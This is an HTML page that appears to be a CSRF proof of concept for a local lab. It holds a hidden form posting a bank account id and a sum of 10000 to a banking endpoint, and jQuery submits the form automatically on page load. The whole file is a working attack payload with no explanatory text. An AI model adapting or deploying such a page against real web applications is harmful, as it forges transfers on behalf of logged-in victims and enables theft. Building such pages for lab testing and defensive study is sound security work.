<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <form id="form_maliciouse" action="http://csrf.local.lab.io/banking" method="post">
        <input name="id_bank" value="100000002">
        <input name="money" value="10000">
    </form>

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script>
        $(document).ready(function(){
            $("#form_maliciouse").submit()
        })
    </script>
    
</body>
</html>